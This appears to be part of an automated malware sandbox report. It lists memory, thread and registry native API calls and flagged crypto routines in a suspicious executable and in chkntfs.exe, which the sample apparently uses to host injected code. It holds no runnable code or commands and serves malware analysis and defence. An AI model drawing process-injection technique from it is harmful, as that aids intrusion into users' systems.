Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_012E2DF0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_012E2C70
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E35C0 NtCreateMutant,LdrInitializeThunk,	3_2_012E35C0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E4340 NtSetContextThread,	3_2_012E4340
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E4650 NtSuspendThread,	3_2_012E4650
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2BA0 NtEnumerateValueKey,	3_2_012E2BA0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2B80 NtQueryInformationFile,	3_2_012E2B80
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2BE0 NtQueryValueKey,	3_2_012E2BE0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2BF0 NtAllocateVirtualMemory,	3_2_012E2BF0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2AB0 NtWaitForSingleObject,	3_2_012E2AB0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2AF0 NtWriteFile,	3_2_012E2AF0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2AD0 NtReadFile,	3_2_012E2AD0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2D30 NtUnmapViewOfSection,	3_2_012E2D30
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2D00 NtSetInformationFile,	3_2_012E2D00
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2D10 NtMapViewOfSection,	3_2_012E2D10
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2DB0 NtEnumerateKey,	3_2_012E2DB0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2DD0 NtDelayExecution,	3_2_012E2DD0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2C00 NtQueryInformationProcess,	3_2_012E2C00
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2C60 NtCreateKey,	3_2_012E2C60
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2CA0 NtQueryInformationToken,	3_2_012E2CA0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2CF0 NtOpenProcess,	3_2_012E2CF0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2CC0 NtQueryVirtualMemory,	3_2_012E2CC0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2F30 NtCreateSection,	3_2_012E2F30
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2F60 NtCreateProcessEx,	3_2_012E2F60
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2FA0 NtQuerySection,	3_2_012E2FA0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2FB0 NtResumeThread,	3_2_012E2FB0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2F90 NtProtectVirtualMemory,	3_2_012E2F90
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2FE0 NtCreateFile,	3_2_012E2FE0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2E30 NtWriteVirtualMemory,	3_2_012E2E30
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2EA0 NtAdjustPrivilegesToken,	3_2_012E2EA0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2E80 NtReadVirtualMemory,	3_2_012E2E80
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2EE0 NtQueueApcThread,	3_2_012E2EE0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E3010 NtOpenDirectoryObject,	3_2_012E3010
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E3090 NtSetValueKey,	3_2_012E3090
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E39B0 NtGetContextThread,	3_2_012E39B0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E3D10 NtOpenProcessToken,	3_2_012E3D10
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E3D70 NtOpenThread,	3_2_012E3D70
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04814650 NtSuspendThread,LdrInitializeThunk,	14_2_04814650
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04814340 NtSetContextThread,LdrInitializeThunk,	14_2_04814340
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812CA0 NtQueryInformationToken,LdrInitializeThunk,	14_2_04812CA0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812C60 NtCreateKey,LdrInitializeThunk,	14_2_04812C60
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812C70 NtFreeVirtualMemory,LdrInitializeThunk,	14_2_04812C70
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812DD0 NtDelayExecution,LdrInitializeThunk,	14_2_04812DD0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812DF0 NtQuerySystemInformation,LdrInitializeThunk,	14_2_04812DF0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812D10 NtMapViewOfSection,LdrInitializeThunk,	14_2_04812D10
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812D30 NtUnmapViewOfSection,LdrInitializeThunk,	14_2_04812D30
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812E80 NtReadVirtualMemory,LdrInitializeThunk,	14_2_04812E80
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812EE0 NtQueueApcThread,LdrInitializeThunk,	14_2_04812EE0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812FB0 NtResumeThread,LdrInitializeThunk,	14_2_04812FB0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812FE0 NtCreateFile,LdrInitializeThunk,	14_2_04812FE0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812F30 NtCreateSection,LdrInitializeThunk,	14_2_04812F30
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812AD0 NtReadFile,LdrInitializeThunk,	14_2_04812AD0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812AF0 NtWriteFile,LdrInitializeThunk,	14_2_04812AF0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812BA0 NtEnumerateValueKey,LdrInitializeThunk,	14_2_04812BA0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812BE0 NtQueryValueKey,LdrInitializeThunk,	14_2_04812BE0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	14_2_04812BF0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812B60 NtClose,LdrInitializeThunk,	14_2_04812B60
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_048135C0 NtCreateMutant,LdrInitializeThunk,	14_2_048135C0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_048139B0 NtGetContextThread,LdrInitializeThunk,	14_2_048139B0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812CC0 NtQueryVirtualMemory,	14_2_04812CC0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812CF0 NtOpenProcess,	14_2_04812CF0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812C00 NtQueryInformationProcess,	14_2_04812C00
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812DB0 NtEnumerateKey,	14_2_04812DB0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812D00 NtSetInformationFile,	14_2_04812D00
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812EA0 NtAdjustPrivilegesToken,	14_2_04812EA0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812E30 NtWriteVirtualMemory,	14_2_04812E30
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812F90 NtProtectVirtualMemory,	14_2_04812F90
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812FA0 NtQuerySection,	14_2_04812FA0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812F60 NtCreateProcessEx,	14_2_04812F60
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812AB0 NtWaitForSingleObject,	14_2_04812AB0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04812B80 NtQueryInformationFile,	14_2_04812B80
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04813090 NtSetValueKey,	14_2_04813090
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04813010 NtOpenDirectoryObject,	14_2_04813010
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04813D10 NtOpenProcessToken,	14_2_04813D10
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04813D70 NtOpenThread,	14_2_04813D70
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_005B8120 NtAllocateVirtualMemory,	14_2_005B8120
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_005B7CF0 NtCreateFile,	14_2_005B7CF0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_005B7E50 NtReadFile,	14_2_005B7E50
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_005B7F30 NtDeleteFile,	14_2_005B7F30
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_005B7FC0 NtClose,	14_2_005B7FC0

Detected potential crypto function

Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 0_2_026E4078	0_2_026E4078
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 0_2_026E0040	0_2_026E0040
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 0_2_026E6040	0_2_026E6040
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 0_2_026E001E	0_2_026E001E
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_004100DB	3_2_004100DB
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_004100E3	3_2_004100E3
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_00401140	3_2_00401140
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_00402910	3_2_00402910
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0040113E	3_2_0040113E
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0042D983	3_2_0042D983
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_00416A63	3_2_00416A63
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_004032B7	3_2_004032B7
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_00403300	3_2_00403300
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_00410303	3_2_00410303
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0040E383	3_2_0040E383
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0040E4C8	3_2_0040E4C8
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_004024F0	3_2_004024F0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0040E55C	3_2_0040E55C
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_00402680	3_2_00402680
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012A0100	3_2_012A0100
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0134A118	3_2_0134A118
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01338158	3_2_01338158
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_013641A2	3_2_013641A2
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_013701AA	3_2_013701AA
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_013681CC	3_2_013681CC
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01342000	3_2_01342000
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0136A352	3_2_0136A352
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_013703E6	3_2_013703E6
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012BE3F0	3_2_012BE3F0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01350274	3_2_01350274
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_013302C0	3_2_013302C0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012B0535	3_2_012B0535
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01370591	3_2_01370591
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01354420	3_2_01354420
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01362446	3_2_01362446
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0135E4F6	3_2_0135E4F6
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012B0770	3_2_012B0770
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012D4750	3_2_012D4750
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012AC7C0	3_2_012AC7C0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012CC6E0	3_2_012CC6E0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012C6962	3_2_012C6962
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012B29A0	3_2_012B29A0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0137A9A6	3_2_0137A9A6
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012BA840	3_2_012BA840
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012B2840	3_2_012B2840
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012968B8	3_2_012968B8
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012DE8F0	3_2_012DE8F0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0136AB40	3_2_0136AB40
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01366BD7	3_2_01366BD7
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012AEA80	3_2_012AEA80
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012BAD00	3_2_012BAD00
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0134CD1F	3_2_0134CD1F
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012C8DBF	3_2_012C8DBF
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012AADE0	3_2_012AADE0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012B0C00	3_2_012B0C00
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01350CB5	3_2_01350CB5
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012A0CF2	3_2_012A0CF2
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01352F30	3_2_01352F30
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012F2F28	3_2_012F2F28
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012D0F30	3_2_012D0F30
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01324F40	3_2_01324F40
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0132EFA0	3_2_0132EFA0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012BCFE0	3_2_012BCFE0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012A2FC8	3_2_012A2FC8
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0136EE26	3_2_0136EE26
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012B0E59	3_2_012B0E59
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0136CE93	3_2_0136CE93
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012C2E90	3_2_012C2E90
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0136EEDB	3_2_0136EEDB
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E516C	3_2_012E516C
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0129F172	3_2_0129F172
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0137B16B	3_2_0137B16B
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012BB1B0	3_2_012BB1B0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0136F0E0	3_2_0136F0E0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_013670E9	3_2_013670E9
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012B70C0	3_2_012B70C0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0135F0CC	3_2_0135F0CC
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0136132D	3_2_0136132D
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0129D34C	3_2_0129D34C
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012F739A	3_2_012F739A
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012B52A0	3_2_012B52A0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_013512ED	3_2_013512ED
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012CB2C0	3_2_012CB2C0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01367571	3_2_01367571
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0134D5B0	3_2_0134D5B0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_013795C3	3_2_013795C3
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0136F43F	3_2_0136F43F
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012A1460	3_2_012A1460
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0136F7B0	3_2_0136F7B0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012F5630	3_2_012F5630
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_013616CC	3_2_013616CC
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01345910	3_2_01345910
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012B9950	3_2_012B9950
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012CB950	3_2_012CB950
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0131D800	3_2_0131D800
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012B38E0	3_2_012B38E0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0136FB76	3_2_0136FB76
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012CFB80	3_2_012CFB80
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01325BF0	3_2_01325BF0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012EDBF9	3_2_012EDBF9
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01323A6C	3_2_01323A6C
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01367A46	3_2_01367A46
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0136FA49	3_2_0136FA49
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012F5AA0	3_2_012F5AA0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01351AA3	3_2_01351AA3
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0134DAAC	3_2_0134DAAC
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0135DAC6	3_2_0135DAC6
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01367D73	3_2_01367D73
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012B3D40	3_2_012B3D40
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01361D5A	3_2_01361D5A
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012CFDC0	3_2_012CFDC0
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01329C32	3_2_01329C32
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0136FCF2	3_2_0136FCF2
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0136FF09	3_2_0136FF09
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0136FFB1	3_2_0136FFB1
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012B1F92	3_2_012B1F92
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01273FD5	3_2_01273FD5
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_01273FD2	3_2_01273FD2
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012B9EB0	3_2_012B9EB0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0488E4F6	14_2_0488E4F6
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04884420	14_2_04884420
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04892446	14_2_04892446
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_048A0591	14_2_048A0591
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047E0535	14_2_047E0535
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047FC6E0	14_2_047FC6E0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047E0770	14_2_047E0770
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047DC7C0	14_2_047DC7C0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04804750	14_2_04804750
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04872000	14_2_04872000
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_048A01AA	14_2_048A01AA
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_048941A2	14_2_048941A2
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_048981CC	14_2_048981CC
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047D0100	14_2_047D0100
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0487A118	14_2_0487A118
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04868158	14_2_04868158
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_048602C0	14_2_048602C0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04880274	14_2_04880274
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_048A03E6	14_2_048A03E6
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047EE3F0	14_2_047EE3F0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0489A352	14_2_0489A352
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04880CB5	14_2_04880CB5
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047E0C00	14_2_047E0C00
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047D0CF2	14_2_047D0CF2
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047EAD00	14_2_047EAD00
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0487CD1F	14_2_0487CD1F
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047DADE0	14_2_047DADE0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047F8DBF	14_2_047F8DBF
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0489CE93	14_2_0489CE93
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047E0E59	14_2_047E0E59
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0489EEDB	14_2_0489EEDB
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0489EE26	14_2_0489EE26
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047F2E90	14_2_047F2E90
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0485EFA0	14_2_0485EFA0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047ECFE0	14_2_047ECFE0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04822F28	14_2_04822F28
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04800F30	14_2_04800F30
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047D2FC8	14_2_047D2FC8
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04882F30	14_2_04882F30
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04854F40	14_2_04854F40
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047E2840	14_2_047E2840
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047EA840	14_2_047EA840
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0480E8F0	14_2_0480E8F0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047C68B8	14_2_047C68B8
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047F6962	14_2_047F6962
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_048AA9A6	14_2_048AA9A6
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047E29A0	14_2_047E29A0
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_047DEA80	14_2_047DEA80
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_04896BD7	14_2_04896BD7
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 14_2_0489AB40	14_2_0489AB40
